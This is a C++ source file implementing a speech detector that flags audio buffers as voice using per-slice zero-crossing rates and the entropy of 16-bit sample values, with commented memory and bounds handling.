HM_MicAgent/QSpeechDetect.cpp
#include <stdio.h>
#include <math.h>
#include "QSpeechDetect.h"
#define SLICE_INTERVAL 4 // 1/4 di secondo
// Builds a detector over a private copy of the audio in pBuffer. Only the
// first 16-bit sample of every interleaved frame (i.e. the first channel) is
// copied, so pBuffer does not need to outlive the constructor call.
//
// pBuffer           -> Pointer to the buffer that holds the raw audio data
// uSamplesPerSecond -> Samples acquired per second
// uBitsPerSecond    -> Bits of precision of each sample (despite the name).
//                      Only used for the minimum-length check: samples are
//                      always read as 16-bit values.
// uRecordChannels   -> Number of recording channels interleaved in pBuffer
// uBufLen           -> Length (in bytes) of the buffer pointed to by pBuffer
// fThresh           -> Stored in fZeroThreshold; IsVoice() uses it as the upper
//                      bound for a slice's zero-crossing value
//
// If the arguments are rejected or an allocation fails, the object is left in
// a state where IsVoice() returns FALSE (pData and/or pTable are NULL).
QSpeechDetect::QSpeechDetect(PBYTE pBuffer, UINT uSamplesPerSecond, UINT uBitsPerSecond, UINT uRecordChannels, UINT uBufLen, FLOAT fThresh):
uBits(16), uChannels(2), uSamples(44100), fZeroThreshold(0.26f)
{
    UINT i, j;
    UINT uFrameBytes;

    // Put every member that is not in the initializer list into a known state
    // BEFORE any early return: the destructor and SetBuffer() call delete[] on
    // these pointers, which must therefore never be left uninitialised.
    pData = NULL;
    pTable = NULL;
    uLength = 0;
    uTotalSamples = 0;
    uTotalSamplesPerChannel = 0;

    if(pBuffer == NULL || uSamplesPerSecond == 0 || uBitsPerSecond == 0 || uRecordChannels == 0 || uBufLen == 0)
        return;

    if(uBufLen < uRecordChannels * (uBitsPerSecond / 8))
        return;

    fZeroThreshold = fThresh;
    uSamples = uSamplesPerSecond;
    uBits = 16; // Always forced to 16 because pData is allocated as SHORT
    uChannels = uRecordChannels;
    uLength = uBufLen;
    uTotalSamples = uLength / (uBits / 8);
    uTotalSamplesPerChannel = uTotalSamples / uChannels;

    pData = new(std::nothrow) SHORT[uTotalSamplesPerChannel];
    if(pData == NULL)
        return;

    pTable = new(std::nothrow) SHORT[0xFFFF + 1];
    if(pTable == NULL)
        return;

    // Copy the first sample of each frame. The loop is bounded by the number
    // of samples actually allocated (not by uBufLen), so a buffer whose length
    // is not a whole number of frames can neither overflow pData nor cause a
    // read past the end of pBuffer.
    uFrameBytes = (uBits / 8) * uChannels;
    for(i = 0, j = 0; j < uTotalSamplesPerChannel; i += uFrameBytes, j++)
        pData[j] = *((SHORT *)(&pBuffer[i]));
}
// Releases the sample copy (pData) and the lookup table (pTable) owned by the
// detector and resets both pointers.
QSpeechDetect::~QSpeechDetect()
{
    // delete[] on a null pointer is a no-op, so no explicit checks are needed.
    delete[] pData;
    pData = NULL;

    delete[] pTable;
    pTable = NULL;
}
// Replaces the audio analysed by IsVoice() with the content of pBuffer, using
// the channel count and sample width configured by the constructor. As in the
// constructor, only the first 16-bit sample of every frame is copied.
//
// pBuffer -> Pointer to the buffer that holds the raw audio data
// uBufLen -> Length (in bytes) of the buffer pointed to by pBuffer
//
// The call is ignored when pBuffer is NULL or shorter than one frame. If the
// allocation fails, pData is left NULL and IsVoice() will return FALSE.
void QSpeechDetect::SetBuffer(PBYTE pBuffer, UINT uBufLen)
{
    UINT i, j;
    const UINT uFrameBytes = (uBits / 8) * uChannels;

    // A zero frame size would make the divisions below fault.
    if(pBuffer == NULL || uFrameBytes == 0 || uBufLen < uFrameBytes)
        return;

    uLength = uBufLen;
    uTotalSamples = uLength / (uBits / 8);
    uTotalSamplesPerChannel = uTotalSamples / uChannels;

    // Drop the previous copy (delete[] on NULL is a no-op).
    delete[] pData;
    pData = NULL;

    pData = new(std::nothrow) SHORT[uTotalSamplesPerChannel];
    if(pData == NULL)
        return;

    // Bounded by the number of samples allocated (not by uBufLen), so a
    // trailing partial frame can neither overflow pData nor cause a read past
    // the end of pBuffer.
    for(i = 0, j = 0; j < uTotalSamplesPerChannel; i += uFrameBytes, j++)
        pData[j] = *((SHORT *)(&pBuffer[i]));
}
// Decides whether the currently loaded samples look like speech.
//
// Two measures are combined:
//  - a zero-crossing value computed on slices of uSamples / SLICE_INTERVAL
//    samples; a slice counts as a hit when its value lies in
//    [ZERO_SILENCE_THRESHOLD, fZeroThreshold];
//  - the entropy (in bits) of the distribution of the 16-bit sample values.
//
// Returns TRUE when more than ZERO_SENSITIVITY slices are hits and the entropy
// is above ENTROPY. Returns FALSE when no buffer is loaded or the constructor
// did not complete. Returns TRUE when a temporary allocation fails.
//
// The sample copy (pData) is released before returning a verdict, so a new
// buffer must be supplied through SetBuffer() before calling IsVoice() again.
BOOL QSpeechDetect::IsVoice()
{
    INT iTmp;
    UINT i, j, k;
    UINT uSamplesPerInterval, uIntervals, uPerc = 0;
    SHORT sSampleA, sSampleB;
    FLOAT fAvg, fEntropy = 0.0f, fVar;
    PFLOAT fZero = NULL;
    UINT *pHistogram = NULL;
    const UINT uTableEntries = 0xFFFF + 1; // One entry per possible 16-bit value

    // pTable is only checked, not used: when its allocation failed the
    // constructor returned before filling pData, so there is nothing valid
    // to analyse.
    if(pData == NULL || pTable == NULL)
        return FALSE;

    // Compute the zero-crossing rate on slices of 1/SLICE_INTERVAL seconds
    uSamplesPerInterval = uSamples / SLICE_INTERVAL; // Samples in one slice
    if(uSamplesPerInterval == 0)
        uSamplesPerInterval = 1; // Sampling rates below SLICE_INTERVAL would divide by zero and never advance the loop
    uIntervals = uTotalSamplesPerChannel / uSamplesPerInterval; // Number of full slices to analyse

    // +1 because the loop below also writes an entry for a trailing partial slice
    fZero = new(std::nothrow) FLOAT[uIntervals + 1];
    if(fZero == NULL)
        return TRUE; // When in doubt, report voice

    // Occurrence counts are kept in a local UINT table: the SHORT cells of
    // pTable wrap around as soon as a value occurs more than 32767 times,
    // which turns the probability negative and the entropy into NaN.
    pHistogram = new(std::nothrow) UINT[uTableEntries];
    if(pHistogram == NULL){
        delete[] fZero;
        return TRUE; // When in doubt, report voice
    }
    memset(pHistogram, 0x00, sizeof(UINT) * uTableEntries);

    for(i = 0, k = 0; i < uTotalSamplesPerChannel; i += uSamplesPerInterval, k++){
        fAvg = 0.0f;

        for(j = i; j < i + uSamplesPerInterval - 1 && j < uTotalSamplesPerChannel - 1; j++){
            sSampleA = pData[j];
            sSampleB = pData[j + 1];

            // 2 when the two consecutive samples differ in sign, 0 otherwise
            iTmp = abs(((sSampleB >= 0) ? 1 : -1) - ((sSampleA >= 0) ? 1 : -1));
            fAvg += (FLOAT)iTmp;
        }

        // NOTE(review): the slice is normalised by the TOTAL number of samples
        // rather than by the slice length, so the value depends on the buffer
        // length. Left unchanged because the thresholds are presumably tuned
        // against this scale - confirm before altering.
        fAvg /= 2.0f * uTotalSamplesPerChannel;
        fZero[k] = fAvg * 100.0f;
    }

    // Count the full slices whose zero-crossing value falls in the voice band
    uPerc = 0;
    for(i = 0; i < uIntervals; i++){
        if(fZero[i] <= fZeroThreshold && fZero[i] >= ZERO_SILENCE_THRESHOLD)
            uPerc++;
    }

    // Histogram of the sample values, used for the entropy
    for(i = 0; i < uTotalSamplesPerChannel; i++){
        pHistogram[(USHORT)pData[i]] += 1;
    }

    // Compute the entropy over ALL 0x10000 entries (index 0xFFFF, i.e. the
    // sample value -1, included)
    for(i = 0; i < uTableEntries; i++){
        if(pHistogram[i]){
            fVar = (FLOAT)pHistogram[i] / (FLOAT)uTotalSamplesPerChannel;
            fEntropy += (-(fVar * log2(fVar)));
        }
    }

    // The samples are consumed by the analysis
    delete[] pData;
    pData = NULL;

    delete[] fZero;
    delete[] pHistogram;

    // To disable the entropy filter it is enough to
    // comment out: "&& fEntropy > ENTROPY"
    if(uPerc > ZERO_SENSITIVITY && fEntropy > ENTROPY)
        return TRUE;
    else
        return FALSE;
}
// Base-2 logarithm obtained through a change of base:
// log2(x) = log(x) / log(2).
inline FLOAT QSpeechDetect::log2(float x)
{
    return log(x) / log(static_cast<FLOAT>(2));
}